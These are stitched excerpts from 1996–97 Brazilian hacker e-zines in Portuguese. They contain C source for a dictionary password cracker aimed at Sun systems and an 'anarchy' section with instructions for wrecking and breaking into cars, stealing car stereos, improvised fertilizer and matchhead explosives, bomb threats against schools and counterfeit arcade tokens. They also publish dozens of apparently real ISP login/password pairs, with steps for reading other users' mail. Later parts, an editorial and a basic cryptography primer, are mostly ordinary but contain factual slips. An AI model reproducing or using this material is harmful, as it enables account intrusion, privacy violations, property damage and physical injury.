passwords, if dictionary filename is NULL, ignore this operation */ void do_dict( void ) { FILE *fp; char buff[WORDSIZE], temp[2]; int c; strcpy(buff, ""); strcpy(temp, ""); if (dict == NULL) exit(0); if ((fp = fopen(dict, "r")) == NULL) { printf("Error opening dictionary file\n"); exit(0); } rewind(fp); while ((c = fgetc(fp)) != EOF) { if ((c != ' ') || (c != '\n')) { strcpy(temp, ""); sprintf(temp, "%c", c); strncat(buff, temp, 1); } if (c == '\n') { if (buff[0] != ' ') try_word(buff); strcpy(buff, ""); } } fclose(fp); } /* Process the word to be used as a password by stripping \n from it if necessary, then use the pwdauth() function, with the login name and word to attempt to get a valid id & password */ void try_word( char pw[] ) { int pwstat, i, pwlength; char temp[2], buff[WORDSIZE]; strcpy(buff, ""); pwlength = strlen(pw); for (i = 0; i != pwlength; i++) { if (pw[i] != '\n') { strcpy(temp, ""); sprintf(temp, "%c", pw[i]); strncat(buff, temp, 1); } } if (strlen(buff) > 3 ) { printf("Trying : %s\n", buff); if (pwstat = pwdauth(logname, buff) == NULL) { printf("Valid Password! - writing details to 'data'\n"); write_details(buff); if (strcmp(mode, "f") == NULL) exit(0); } } } /* If valid account & password, store this, along with the accounts uid, gid, comment, homedir & shell in a file called 'data' */ void write_details( char *pw ) { FILE *fp; if ((fp = fopen(OUTFILE, "a")) == NULL) { printf("Error opening output file\n"); exit(0); } fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid); fprintf(fp, "%s:%s:%s\n", comment, homedir, shell); fclose(fp); } ---CORTE AQUI----------------------------------------------------------- Bom... pra compilar isso escreva: $ gcc shcrack.c -o shcrack Ou tente! $ acc shcrack.c -o shcrack Isso pode variar dependendo do seu compilador. }-===============================[chain]===============================-{ 9-) ANARCHY ~~~~~~ Como mandar um carro para o inferno! ---------------------------------------------- Existem mil maneiras de destruir um carro mas lembre-se que isso pode ser divertido para voce, destrutivo para alguem e dificil dos policiais pegar. - Coloque uma bomba de CO2 perto do tanque de gasolina. - Coloque sujeira, acucar ( esse e´ bom ), uma bolinha de ping-pong ou al- guma coisa que dissolva no tanque de gasolina. - Plastico deforma e dilue dentro do tanque. O resultado final e dificul- dade de injetar gasolina. Causando possivelmente a troca da valvula. - Uma boa e coloca, pedras, bananas, alguma coisa que vai tampar dentro do cano de descarga. * Use um pedaco de pau para empurrar para dentro. - Coloque um fio comprido no tanque de gasolina e acenda ele. - Roube a chave, tire uma copia, coloque ela no lugar novamente e roube o som do carro. - Arrombe o carro. Corte um pedacao de metal fino parecido com o desenho: Ú-Ä¿ OBS.:VEJA O DESENHO COM MODO TERMINAL PARA ENTENDER ³ ³ ³ ³ ³ ³ ³ ³ ³ ÚÙ ³ À¿ ÀÄÄÙ Faca a operacao do lado de fora do carro. Coloque do lado de fora do vi- dro forcando o cabo o qual vai desbloquear a porta. Essa tecnica e conhe- cida como SLIM JIM. Agora voce pode roubar o som, equalizador, detector de radar. Dica: Para destruir o interior do carro jogue um cachorro ou um gato. Um pato tambem serve por nao ter bons habitos de higiene. - Expelhos restrovisores sao muito facil de ser arrancados. Geralmente empurrando do lado expelhado eles quebram. - Faca uma bola de DUREPOX com 3 ou 4 pregos, coloque em baixo do pneu. - Pode tambem usar um anel para arranhar as portas. Voce odeia a sua escola? ---------------------------- by HaphazarD - Brazil - Global Domination inc. - Realmente a minha favorita e passar cola ( melhor usar cola de sapatei- ro ) nas fechaduras da entrada e por tudo onde for possivel. - Voce pode tambem colocar uma bomba no banheiro, ou simplesmente colocar uma falsa bomba no banheiro, certamente eles terao que investigar e sus- penderao as aulas naquele dia. - Peque um pouco de potassio puro ou sodio puro, coloque isso em uma capsu- la e manda embora com a descarga do banheiro ( cheiro podre! ) - Coloque uma granada com cigarro no hall de entrada! Uma bomba normal com pavio de cigarro, que demora em media 15 minutos para explodir, enquando voce esta na sua sala de aula e vai ouvir o barrulho junto aos seus ami- gos. - Roube senhas ou chaves de computadores. Ou roube o cartao de 80 colunas que tem dentro dos IBMs. - Mande uma carta para sua escola com um disco de 1.2 ou um de 1.44, ( segredo: coloque dentro do disco pedacos pequenos de imans ). Para pa- recer real coloque uma etiqueta bonita e diga na carta que e' um novis- simo anti-virus que esta sendo mandado para todas as escolas. Se preciso falsifique o simbolo do governo do estado. - Jogue seu chiclete no carpete da biblioteca ou alguma coisa que grude bastante. Fique cuidando os auxiliares de disciplina chorarem. - Pinte no murro da escola que o diretor e' facista. - Coloque uma batata no cano de descarga do diretor. - Pegue um virus em uma BBS e infecte os computadores deles. De preferencia se tiver Word ou Excel... argg.... - Use um clips prendendo-o com uma borracha. ( para nao ser eletrocutado ) coloque ele na tomada, a maneira mais facil de queima-la. Como fazer uma bomba de fertilizante --------------------------------------------- Ingredientes: - Jornal - Fertilizante ( escolha o tipo quimico ) - Algodao - Diesel ( combustivel ) Faca um montinho de jornal e coloque um pouco de fertilizante dentro. Coloque algodao sobre ele e entao ensope o algodao com o diesel. Acenda e depois corra como voce nunca correu antes. A explosao é violen- ta portanto nao faca isso em ambiente fechados. Bola de tenis bomba --------------------- Ingredientes: - Milhoes de cabeca de palito - Uma bola de tenis - Uma faca bem afiada - Fita bem forte Depois de arrancar uma tonelada de cabeca de palito de fosforo corte um PEQUENO buraco em uma bola de tenis. Encha a bola com as cabecas de palitos ate nao ter mais espaco nenhum. Fique certo que isso e´muito legal mesmo! Bom, quando voce ver algum amigo andando na rua jogue nele. Ele vai le- var o maior susto com o estouro. Como jogar fliperama de graca ------------------------------ Ingredientes: - Tampas de garrafa - Vela branca grossa - Faca bem afiada - Uma ficha de fliperama original Corte a vela em pequenas rodelas parecidas com a ficha. Amasse bem as tampinhas de modo que fiquem muito finas, e entao coloque as laminas metalicas dentro das da vela. Nao esqueca de dar o formato das entradas moldados na cera entao deixe elas no refrigerador por umas 5 horas ate ficar bem duras. }-===============================[chain]===============================-{ 10-) CARTAS ~~~~~~ Nao tem carta nao, simplesmente pelo fato de que estamos comecando, entao se voce tem alguma duvida, comentario, critica, dica ou mesmo quer fazer parte da equipe que vai comecar a distribuir nossa revista entre em conta- to com: AciDmuD - acidmud@thepentagon.com VooDoo - voodoo@deathsdoor.com HaphazarD - por minha parte falar sobre anarchy nao darei meu e-mail Para que sua BBS receba sempre um exemplar primeiro que os outros escreva-nos Prometemos publicar todo material que nos for enviado, claro depois de avali- ado. Tambem nao vamos colocar lixo e besteiras... Se voce achar algum erro em nosso material escreva-nos por favor. Sua participacao e'muito importante para nos, pois soh assim continuaremos com nosso zine. Voce pode nos encontrar tambem no canal #hackers e #bluebox nos servidores de irc brasileiros. ex: irc.kanopus.com.br e irc.bsi.com.br AVISO: Nao distribua essa revista para pessoas que trabalhem em provedores. *************************************************************************** BONUS EXTRA --------------------------------- senhas de provedores *************************************************************************** (c)1996 Reg. by AciDmuD & VooDoo Global Domination Inc. Cortesia de AciDmuD e VooDoo servindo a comunidade hacker e contribuindo com a DESTRUICAO dos provedores Obs.: Provedores com precos abusivos. OnLy! E'... pra ver como nos somos generosos. Ai estao algumas senhas de dois grandes provedores brasileiros, um de Sao Paulo e outro de Joinville -SC. Com essas senhas alem de acessar a inet de graca voce pode ler o mail de outras pessoas somente trocando a configuracao do seu software de mail. Tipo... substitua onde diz: seu.provedor.com.br por kanopus.com.br Onde tem o login voce deve colocar o novo login com sua respectiva senha. Pode usar o soft de telnet para acessar a esses users. Onde for netville use: netville.com.br Para ler os mails escreva no prompt do telnet. $ mail Vai aparecer uma lista que voce pode acessar por meio dos numeros. ----------------------------------------------------------------------- SE SEU NOME APARECE NA LISTA ABAIXO NAO SE OFENDA. ALEM DE VOCE SER PES- SIMO NA ESCOLHA DA SENHA SEU PROVEDOR E' UMA M3RD4.... ----------------------------------------------------------------------- ---->>> Mes que vem tem as senhas da ELOGICA e da BRAZNET <<<----- - KANOPUS - LOGIN SENHA ----- ----- help help funcao.help help gr3350 123 fwa 1234 gr2502 12345 gr4240 1961 niki 1963 wellner 1978 c.surek 1996 danielbr zool anafonso zool veralm zool agenor agenor apsoft alex mggatech arcadia axel axel uteste banana demo15 banana artes banana viana behrens farinha brasilia nr7pcmso cad carolina carolina cecilia cecilia nepomoceno claudio gr5035 claudio gr6000 claudio costa costa customer customer dag dag danielle danielle ecg840 deborah teodoro digital dgavden duncan eliane eliane email email reginato emilia harbar eugenio fernando fernando florinda florinda sandor gabriel thomaz guipar helio helio siqueira hendrix hermes hermes clsb ibm mruiz irina hideko iris jere jere wap julio hell joplin grios jessi uruzinho jesus grios jessi - NETVILLE - LOGIN SENHA ----- ----- agenciaa public acf01 andre baf 1950 peters 1960 homke 1994 ivansky 1996 aro 1998 lineu alexia garcia aline jba ana guido andrey petit angelico cetil arosa jardim arte eder base acs brenda marquiot bruna fgomes cardinal adelar carla profit carlos cboff carmem eydiniz carol wlau carol schulz change lula cherry hahnte chicago shb cris dminatti data festugat debi cfzucco debora raso denis adelor diego grafos dino magno disney igorz flora brach floyd marias fred anaclara gabriel mserv gabriel blinz golf ascensao grith langsch honda shiino honda wiletrup honda peninha jake kids joshi mrmobius jumar labirint karl fabiola lara baptista laura dornel lili like2net net rhl2net odessa cdsanjos palma prf2net paulo psb01 pedro lotario perry spiazera pia ruben raquel maine rock nucleo rodrigo scarlet scarlet edukato dudu dopke earth polido edna aerton elaine bragam silvio manz fana cordeaca timmy flaps tito datasul transfer jbone22i valdivia deli viktoria smachado viper ruwan wizard sasse wolfgang matheus aloha berg berg preprint bureau cristaos call hansa cargo momento chosse airton cinema claudia clad simetria clash jms disco danca festival *************************************************************************** BONUS EXTRA --------------------------------- senhas de provedores *************************************************************************** - SE QUISER QUE A REVISTA CONTINUE ESCREVA-NOS, ATENDEREMOS A TODOS - - AGUARDEM - EM BREVE - O PROXiMO NUMERO DA SUA REViSTA HACKER - AXUR 05 - - = = = DiA 01 De FEVEREiRO = = = - EM TODAS AS BBSz UNDERGROUND -aa -a-a -x -x -u -u -r -rr -000 -55555 -a -a -x -x -u -u -r-r -0 -0-5 -a a-a -x -u -u -rr -0 -0-5555 -a -a -x -x -u -u -r -0 -0 -5 -a -a-x -x -uuu uu -r -000 -5555 -- = = [AXUR 05 - DARK SIDE HACKERS - BRAZIL] = = -- ~~~~ ~~ ~ ~~~~ ~~~~ ~~~~~~~ ~~~~~~ Axur 05 - revista mensal ( todos dia 01 na BBS mais pr¢xima). Pagina oficial: http:\\www.axur05.home.ml.org Webmaster - VooDoo - voodoo@deathroom.com Hackerland, 30 de Janeiro de 1997 Revista n§ - 1.00 Sem mestres, sem lamahs, sem deuses... somente no's e nossas ma'quinas. Pra salvar a honra dos Brasileiros! yO outside *fuck you* }-===============================[chain]===============================-{ " Welche Verwirrung, ohn' alle Rettung." - PAPA " ... je ne peux contenir ma fureur." - PeeCee 386 INDICE: 1-) OFFERTORIUM 2-) NEW CAST - O que vai ser de agora em diante? 3-) INICIANDO ESTUDO DE CRIPTOGRAFIA DE DADOS 4-) TECNICAS TELEFONICAS 5-) ESTRUTURA DE EXEs 6-) VULNERABILIDADE do test-cgi em alguns setups! 7-) FINAL DA LISTA DE COMANDOS UNIX 8-) BBS INESCRUPULOSAS 9-) CODIGOS EMSi 10-) MUDANDO SENHAS EM REDE NOVELL 11-) ANARCHY 11.2-) ANARCHY HUMOR 12-) RASTREANDO PORTAS 13-) PHF exploit... 14-) VIRII - Mutacao Virotica Simples & Pesquisa de Diretorios 15-) WAReZ ZONe 16-) HACKEANDO PROVEDORES NOVOS - Metodo Lamer 17-) DETONANDO O CHAT DA UOL 18-) DESAFIO DO MES - ;) 19-) CARTAS **-) BONUX - Catador de senhas em maquinhas Sun --=-- [ MeLHOR DESEMPENHO DE TEXTO Se VISTO COM O EDiTOR DO DOS ] --=-- }-===============================[chain]===============================-{ 1-) OFFERTORIUM... ~~~~~~~~~~~~~~ E' pessoal, tudo comecou como uma brincadeira, realmente nao esperavamos uma aceitacao tao boa por parte da galera do nosso cyber-world. Pelo que sentimos o primeiro numero... ou melhor, a edicao beta final da AXUR 05 repercutiu por todo mundo. Nao foi soh no Brasil nao, foi por tudo, nossa ezine esta sendo distribuida via FTP e via HTTP ate no Japao. Nao sei se foi pelo nosso estilo de escrita, objetivo e claro ou pela co- ragem e determinacao em phuder com os provedores, mas recebemos soh na primeira semana mais de 50 mails. Eram sysopz, curiosos e amigos querendo ajudar, todos aqueles que de alguma forma se identificaram com nossa ide- ologia colaboraram conosco de algum modo. Bom, chega desse papo, eu pareco um viado escrevendo... O que eu tenho pra dizer e' o seguinte, depois que nos colocamos aquelas senhas da kanopus e da netville no numero anterior muito neguinho ficou na nossa cola. Todos bem loucos pra phude com a nossa vida ( coisa que nos estamos fazendo com a deles ) eu so peco uniao em todos os sentidos da comunidade hacker do Brasil, vamos nos unir, nao quero criar grupos e sim pontos base de informacao pesada pra quem realmente ta afim de estu- dar e aprender de forma profunda tudo, aqueles caras que devoram ate o manual do relogio CASIO tb sao bem vindos, pq de agora em diante nossa ezine vai pegar pra valer. Nao tenho nada contra o nosso amigo Merdeval, aquele que escreve a revista Besouro Eletronico ( usei nomes fantasia para nao identifica-lo ) mas vc tb pode nos ajudar distribuindo nossa re- vista em listas de discussoes e mandando pra todos que julgue capazes de compreender o que esta escrito. Vamos nos armar... com nossos PeeCees e tudo que precisarmos para mudar a historia da computacao brasileira, chega de frescura ta na hora de a- girmos e detonarmos. Alguns "nice guys" acharam as nossas ideias meio radicais, putz, vamo pa- ra de frescura, quem nao gostou que nao leia. Bom errar e' humano, se ja leu o primeiro e achou ruim, nao leia o segundo! ;) Tenho um aviso tb para dar a alguns ditos hackers de IRC, porra galera vamo tomar consciencia, onde ja se viu, vamos tomar como exemplo o server de irc da rede brasirc. Tem muito guri novo que vai no canal #hackers e escreve frases assustadores dizendo que vai queimar meu modem... bah! Que babaquice e' essa, ou mesmo operadores que soh querem saber de zkriptz pra mirc e pirch como se derrubar um carinha do canal com flood fosse al- go fora do comum. Ta na hora dessa galera se ligar, o nivel desse tipo de canal em servidores de irc no BR ta muito baixo ou melhor ainda, eles nem tem nivel. Outro detalhe importante e' a questao dos programas que sao solicitados constantemente pela galera, olha ninguem aqui da revista vai passar pro- grama nenhum para ninguem. Ao menos em caso de amigos muito antigos, ima- ginem o saco que e' 50 carinhas por vez suplicando programas ou pensando que vc esta no IRC ou mesmo que seu email funciona como suporte on-line. Quem tb acha que so pq colocamos na primeira edicao da revista que temos que detonar os provedores brasileiro que cobram caro juntamente com as BBS que estao apurrinhadas de sysops incompetentes e estramente chatos leve em consideracao o seguinte, nao ‚ so falar para nos assim, "Olha meu provedor e' caro, me da uma senha de lah", o que nos teremos o maior pra- zer vai ser ensinar vc a fazer isso por si mesmo sem depender de ninguem. Isso foi mais uma especie de desabafo...espero que vcs gostem da revista pois foi feita pensando especialmente na galera brasileira. Agradecimento especial pra galera do canal #hackers da brasirc e braznet. Sao tantos amigos que daria uns 30 Kbytes a mais se eu lista-se todos. ;) Lembrete: IRCOPS PHEDEM - ircporcs - oinc, oinc, oinc, oinc, oinc AciDmuD Was soll ich sagen? - acidmud@thepentagon.com - }-===============================[chain]===============================-{ 2-) NEW CAST - O que vai ser de agora em diante? ~~~~~~~~ ~ ~ ~~~ ~~~ ~~~ ~~ ~~~~~ ~~ ~~~~~~~ De agora em diante nossa ezine vai contar com novos colaboradores que foram convidados devido ao alto conhecimento te'cnico para fazer parte da nossa equipe. Queremos por meio de conhecedores do assunto lhes en- tregar uma revista com a melhor qualidade possivel, colocando em enfase que o pessoal que escreve ta dando um duro danado pra detonar nas ma- terias. Nossa equipe por enquanto esta em: AciDmuD, VooDoo, csh, kS_5. Participacao especial de Van Dyke, Worm-Root, XPiRiT e MnEuMoNiC . XPiRiT ia escrever um artigo mais desapareceu... ficou apenas um arti- go pequeno sobre phreak. Worm-Root escreveu duas materias, se a galera gostar ele continua. MnEuMoNiC vai comecar a escrever sobre warez para a revista...nosso warez- man. Soh nao escreveu mais pq entrou no grupo muito no final do mes. HaphazarD coitado ta se phudendo... Bom, cada um fala mais ou menos de uma coisa, mas isso pode variar muito dependendo do que a galera esta afim de escrever. Quem quiser colaborar com algum artigo realmente interessante pode mandar sem medo somos recep- tivos. Agora sim a ezine vai ser bem mais trabalhada, alguns dos textos encon- trados podem ter sidos retirados de alguma revista ou de alguma BBS, quando isso ocorrer colocaremos o nome do autor e de onde foi tirado. Se vc tem uma home-page ou uma BBS e ta afim de colocar pode colocar, ta liberado, esperamos alcancar o maior numero de pessoas possiveis em menor tempo, pois so causando impacto nossos trabalhos vao ser lidos e podera informar mais o pessoal. }-===============================[chain]===============================-{ 3-) INICIANDO ESTUDO DE CRIPTOGRAFIA DE DADOS ~~~~~~~~~ ~~~~~~ ~~ ~~~~~~~~~~~~ ~~ ~~~~~~ Se vamos detonar alguma coisa somos obrigados a conhecer intimamente as estruturas de protecao de dados de estao envolvidas. Um dos topicos prin- cipais que temos que ter completo dominio e' sem duvida nenhuma a cripto- grafia de dados. As redes hoje transportam cada vez mais informacoes vitais para organiza- coes, empresas e ate mesmo para o governo, a criptografia esta hoje mais dos que nunca ligada a seguranca de dados ja que a SEGURANCA esta se tor- nando um problema critico. Bom, o que ‚ CRIPTOGRAFIA? Vem do grego, kriptos=escondido oculto + grafia, e' a arte ou ciencia de escrever em cifra ou em codigos, seria entao um conjunto de tecnicas que tornam uma mensagem incompreensivel permitindo apenas que o destinatario que conhece a chave de encriptacao consiga desencriptar e ler a mensagem com clareza. Agora existem pessoas que por meios ilicitos podem ter acesso a mensagem cifrada e determinar a chave de encriptacao, estes se chamam criptoanalis- tas que nao fazem nada mais que a decomposicao da mensagem sem conhecer a chave quebrando o sisteminha! ;) A seguranca de um criptosistema nao pode estar baseada nos algoritimos de codificacao e decodificacao, mas sim em um valor a chave. Este mecanismo deve ser tao seguro que mesmo o autor de um algoritimo nao seja capaz de decodificar a mensagem se nao possuir a chave. Podemos dizer entao que um bom criptoanalista conhece todo o sistema com excessao das chaves que fo- ram utilizadas. Esta ‚ conhecida como a premissa de "Kerckoffs". Para um algoritimo ser analizado do ponto de vista de robustez a ataques sao assumidas as seguintes premissas: -> o criptoanalista tem acesso a descricao completa do algoritimo -> o criptoanalista tem acesso a grande volumes de mensagens originais e suas mensagens cifradas correspondentes. -> o criptoanalista e' capaz de escolher quais mensagens serao cifradas e receber as mensagens cifradas correspondentes. Por sigilo da informacao entende-se que somente os usuarios autorizados tenham acesso a informacao. - - - - - - - - - - - - - Em um sistema criptografico tipico utiliza-se as operacoes de ciframento e deciframento. O que ocorre na operacao de deciframento e'normalmente o inverso da de ciframento. Podemos observar um sistema criptografico tipi- co abaixo: CHAVE DE CIFRAMENTO CHAVE DE DECIFRAMENTO | | | | ------------ -------------- TEXTO ORIGINAL- |CIFRAMENTO| -----------------|DECIFRAMENTO|- TEXTO ------------ | -------------- ORIGINAL | | CANAL INSEGURO DE COMUNICACAO E' adotado em sistemas criptograficos para que estes permanecam seguros mesmo quando os algoritimos de ciframento e de deciframento a tecnica de utilizar chaves ao pares, uma delas a chave de ciframento e outra a de deciframento. Deve-se possuir um grande conjunto de pares de chaves para que o espiao nao as descubra, entretanto o sigilo das chaves e' uma peca crucial nestes sistemas. Quando podemos deduzir uma mensagem usado a mesma chave tanto para o ci- framento quanto para o deciframento toma-se a chave do sistema como si- metrica. Caso estas chaves sejam diferentes, fala-se de um sistema de chaves assimetricas ou chave publica. Bom, podemos definir 6 tipos gerais de ataques ( ou criptonalise ), lis- tados em ordem crescente de efetividade. Supondo em todos eles que o cri- ptoanalista possui conhecimento total sobre os metodos de cifragem e de- cifragem utilizados, mas nao sobre as chaves. ->1<- ATAQUE DO TEXTO CIFRADO ( CYPHRTEXT-ONLY ) Neste tipo de ataque, o criptoanalista tem a sua disposicao uma grande quantidade de mensagens cifradas, mas desconhece as mensa- gens originais e as chaves utilizadas, tarefa ardua n‚ :)... ele tera que recuperar as chaves utilizadas e deduzir as chaves utili- zadas. ->2<- ATAQUE DO TEXTO CONHECIDO ( KNOWN-PLAINTEXT ) , ai o negocio fica mais facil, pq o criptoanalista tem a sua dis- posicao uma grande quantidade de mensagens cifradas e ainda por ci- ma conhece tambem as mensagens originais equivalentes. Objetivo ‚ deduzir as chaves utilizadas utlizando o caminho feito pelo siste- ma criptografico. ->3<- ATAQUE ADAPTATIVO DO TXT ESCOLHIDO ( ADAPTATIVE-CHOOSEN-PLAINTEXT ) Este ataque se diferencia do anterior porque agora pode existir uma realimentacao entre a msg escolhida para cifragem e a proxima msg. Agora ele pode fornecer um pequeno conjunto, analisar os resultados fornecer outro conjunto e assim por diante. Este ataque e' bem mais efetivo, pois permite o teste de novas ideias e a sua posterior con- firmacao. Tarefa ‚ deduzir as chaves utilizadas ( ou metodo para re- cuperar mensagens cifradas com a mesma chave. ->4<- ATAQUE DO TEXTO CIFRADO ESCOLHIDO ( CHOOSEN-CIPHERTEXT ) Esse metodo e' o melhor para deduzir as chaves usadas tendo a dispo- sicao uma grande quantidade de mensagens e seus equivalentes cifra- dos alem do que o criptoanalista pode produzir uma mensagem cifrada especifica para ser decifrada e obter o resultado produzido. Utili- za-se geralmente nesse ataque uma "caixa-preta" que faz a decifra- fragem automatica ;) i know bud... ->5<- ATAQUE DE CHAVE ESCOLHIDA ( CHOOSEN-KEY ) Este nem e'considerado um ataque pois a chave ja e' conhecida, mas o criptoanalista pode testar o sistema com as diversas chaves dife- rentes, ou pode convencer diversos usuarios legitimos do sistema a utilizarem determinadas chaves. Nesse ultimo caso, a finalidade e' poder decifrar as mensagens cifradas com estas chaves. - - - - - - - - - - - - - Todos os sistemas possuem graus diferentes de seguranca, isso depende mui- to da facilidade ou dificuldade com que sao quebrados. So teremos um sis- tema condicionalmente seguro quando ele for teoricamente inquebravel ou seja, nao importa a quantidade de texto normal ou cifrado a disposicao do analista, nunca se tem informacao suficiente para se quebrar as cifras ou deduzir as chaves que foram usadas. Existem alguns metodos de encriptacao realmente phodas de quebrar, levando tempo, alguns chegando perto do infinito. Sera que realmente as informa caoes que esperamos obter com a desencriptacao vale o custo e o tempo que e' levado para resolver o mesmo? Putz! Ja estao com projetos que em um futuro proximo os metodos criptogra- ficos serao tao fortes que mesmo computadores da ordem de Tera operacoes por segundo e levariam alguns milhares de anos pra quebrar um texto bem cifrado. :| Vamos dar uma olhada bem rapida nos metodos da criptografia tradicional: -USANDO CIFRAS DE SUBSTITUICAO- No metodo cada caracter ( ou grupo de caracteres ) na mensagem e' substi- tuido por outro na mensagem cifrada. Esta substituicao e' realizada para tornar o texto cifrado o mais obscuro e incompreensivel. Para decifrar e' feita a substituicao de modo inverso, restaurando-se assim o texto origi- nal. Na maioria dos casos sao considerados apenas as 26 letras do alfabe- to. A substituicao polialfabetica ‚ muito melhor que a mono, mas pode ser que- brada pelo mesmo metodo. Somente se descobrindo o tamanho da chave K e a- nalisar um bloco de K caracteres do texto verificando a frequencia de re- peticao dos caracteres. Vem abaixo entao uma tabela demonstrando a substituicao monoalfabetica, onde cara letra do alfabeto e' substituida por outra. ------------------------------------------------------------------------- LETRA DO TEXTO LETRA CIFRADA | LETRA DO TEXTO LETRA CIFRADA | A ------------------- I | N ------------------- A B ------------------- S | O ------------------- G C ------------------- N | P ------------------- U D ------------------- L | Q ------------------- Y E ------------------- B | R ------------------- K F ------------------- Q | S ------------------- O G ------------------- C | T ------------------- X H ------------------- R | U ------------------- J I ------------------- D | V ------------------- W J ------------------- T | W ------------------- H K ------------------- P | X ------------------- M L ------------------- E | Y ------------------- V M ------------------- Z | Z ------------------- F ------------------------------------------------------------------------- Tah, vamos escrever uma frase: "Como estou aprendendo" Cifrada por esta tabela a frase fica: "Ngzg boxgj iukbalbalg" Com esta tabelinha podemos fazer 26!=4*10 na 26 chaves diferentes. Testando uma tabela a cada microsegundo levariamos 10 na potencia de 13 anos pra tentar todas... Dah pra quebrar facil este sistema usando a logica e ver que vogais se re- petem mais que as consoantes e deduzindo valores. Bom, ainda tem a substituicao monofonica, a substituicao polialfabetica a substituicao por poligramos ( aquela que substitui um grupo de carac- teres tipo: ABA corresponde a RTQ... ) - = CIFRAS DE TRANSPOSICAO = - Esse metodo e' bem original, pois o caracter original nao e' alterado, mas sim sua posicao de acordo com alguma regra ou funcao que tambem po- dem estar baseadas em alguma chave. - = CODIGO E MAQUINHAS DE CIFRAGEM = - Olha, esta parte nao e' tao importante nao, mas se vc realmente quer sa- saber Neste metodo os caracteres podem ser agrupados para serem cifrados e conforme o tamanho do grupo aumenta comeca-se a falar de um codigo. A principal diferenca entre uma cifra e um codigo e' que a primeira traba- lha com grupos de comprimento fixo, enquanto o ultimo utiliza comprimento variavelm normalmente manupulando as proprias palavras da frase. Cada pa- lavra e' substituida por uma outra ( ou por simbolos ) de acordo com um livro codigo. - CRIPTOGRAFIA COMPUTACIONAL DE CHAVE UNICA - ----------------------------------------- Hoje em dia a criptografia tradicional ta cedendo lugar para a computa- cional onde as operacoes sao implementadas por um computador ou por um circuito especial. O exemplo mais conhecido de cifrador computacional de chave unica e' o DES ( Data Encryption Standard ) originalmente desenvolvido pela IBM e adotado como padrao nos EUA em 1997. O DES cifra blocos de 64 bits que correspondem a 8 caracteres usando um chave de 56 bits mais 8 bits de pa- ridade ( o que soma 64 bits ). O que ocorre e' que o algoritimo inicia uma transposicao sobre os 64 bits da mensagem, seguida de 16 passos de cifragem e conclui realizando uma transposicao final, que e' inversa da transposicao inicial. As transposi- coes sao independentes da chave. Vao ser utlizados entao 16 passos de ci- fragem com as 16 sub-chaves todas originadas da chave original atraves de deslocamento e transposicoes. Cada passo vai dividir o bloco em duas metades de 32 bits ( L e R ) e realiza transposicoes, substituicoes, ex- pancoes ( duplicamentos ) de bits e reducao ( eliminacao ) de bits, alem de utilizar operacoes logicas do tipo ou exclusivo. Essa porra do DEs exerce uma cifragem com dois objetivos: difusao e con- fusao. Difunde eliminando a redundancia da mensagem original e confunde tornando a chave tao complexa quanto pode. Tipo, mudando as caracteristi- cas da mensagem original! Quando aparecer e foi aprovado o DES foi alvo d muita critica e debate. O projeto original da IBM previa a utilizacao de 128 bits mas a NSA ( Na- tional Security Agency ) o reduziu pra 64 sem explicacoes... coisas dos malucos do governo americano. O DES pode ser quebrado ( como nao ;) ) mas pelo metodo de forca bruta tentando-se todas as combinacoes possiveis de chaves. Tendo a chave de 56 bits tem-se um total de 2 elevado a 56 potencia de chaves possiveis. O que sabemos e' que existem diversos metodos de cifragem de blocos de chave unica que foram proposto, tem alguns exemplos ai: Triple-DES ( o DES aplicado tres vezes, com sequencia de cifragem e decifragem combinando a utilizacao de duas chaves). Lucifer ( percursor do DES ). Madryga ( trabalha com 8 bits, utilizando ou-exclusivo e desloca- mento de bits ). NewDES ( blocos de 64 bits e chave de 120 bits ) FEAL-N ( baseado no DES, pode-se especificar o numero de passos de cifragem, fraco se utiliza-se em menos de 8 passos ). REDOC II e III ( realizam operacoes sobre bytes ). LOKI ( bloco e chave de 64 bits ). Khufu e Khafre ( parace nome de japones lutador de carate, mas ele traba- lha de forma semelhante ao DES, usam tabelas de substitu- icao de 256 posicoes de 32 bits - contra as de 6 posicoes de 4 bits do DES - usam chaves de 512 bits e um numero de passos flexiveis, multiplo de 8 ). IDEA ( blocos de 64 bits com chave de 128 bits ). MMB ( blocos e chave de 128 bits ). Skipjack ( chave de 80 bits e 32 passos de processamento ). O que eu posso falar de Cifragem de Blocos? Bom, vamos falar o que vcs pre- cisam saber. - Modo do Livro de Codigos ( ELETRONIC CODE BOOK - ECB )- Metodo onde a vantagem e' a simplicidade, cada bloco de mensagem original e' individual e independendente cifrado para produzir os blocos da mensa- gem cifrada. O bloco tipico tem 64 bits, o que produz um livro de codigos de 2 na 64 potencias de entradas ( Obs. Quando digo 2 na potencia 2 e' o mesmo que 2 x 2 que e' igual a 4 ;) ) com essas caracteristicas ele se torna complexo o suficiente para phuder com o criptoanalista. E bem util pra bancos de dados, pois os blocos sao idependentes e no caso da necessidade de modificar pode se decifrar apenas o bloco onde ele es- ta localizado. - Modo de Encadeamento de Blocos ( CIPHER BLOCK CHAINING - CBC ) Pra evitar problemas do ECB, o CBC realimenta a cifragem do bloco atual com o resultado das cifragens dos blocos anteriores. Operacao mais utili- zada e' o ou-exclusivo com o bloco anterior dessa forma os blocos iguais serao normalmente cifrados de forma diferente, desde que no minimo um dos blocos anteriores seja diferente na mensagem. - Modo de Realimentacao de Cifra ( CIPHER FEEDBACK - CFB ) Quando ha necessidade de enviar-se mensagem que possuem tamanho menor que um bloco utiliza-se o metodo CFB que trabalha com grupos ( 8 bits por ex- emplo - 1 caracter ), neste caso a realimentacao e' feita sobre o grupo, utilizando-se tambem o ou-exclusivo. - Modo de Encadeamento de Blocos ( BLOCK CHAINING ) Neste modo, a entrada do cifrador e' operada com um ou-exclusivo de todos os blocos anteriormente cifrados. - Modo de Encadeamento Propagado (PROPAGATING CIPHER BLOCK CHAINING-PCBC) A entrada do cifrador e' operada com ou-exclusivo os blocos normais e ci- frados anteriores o) o) o) o) o) E pessoal, espero que com esses conhecimentos novos vcs possam abrir suas mentes, fazer programas mais eficientes na parte de encriptacao e desen- criptacao e o mesmo entender seus mecanismos. O que eu coloquei acima e' o basico do basico, sei que e'meio chato ficar lendo uma porrada de coisa mais ve se larga de ser viadinho se quer chegar a algum lugar. Eu demorei pra escrever essa porra, tomara que fique do seu entendimento. Quem quiser mandar um mail para se comunicar ou tirar alguma duvida olha no rodape' da materia o meu email. Mais um producao de AciDmuD, in -d- miracle world! ;) =+= Inciando estudo da criptografia......... AciDmuD - 1997(c) Global Domination Inc. - acidmud@thepentagon.com - }-===============================[chain]===============================-{ 4-) TECNICAS TELEFONICAS ~~~~~~~~ ~~~~~~~~~~~ Ligando de telefone publico sem pagar! - by XPiRiT - - - - - - - - - - 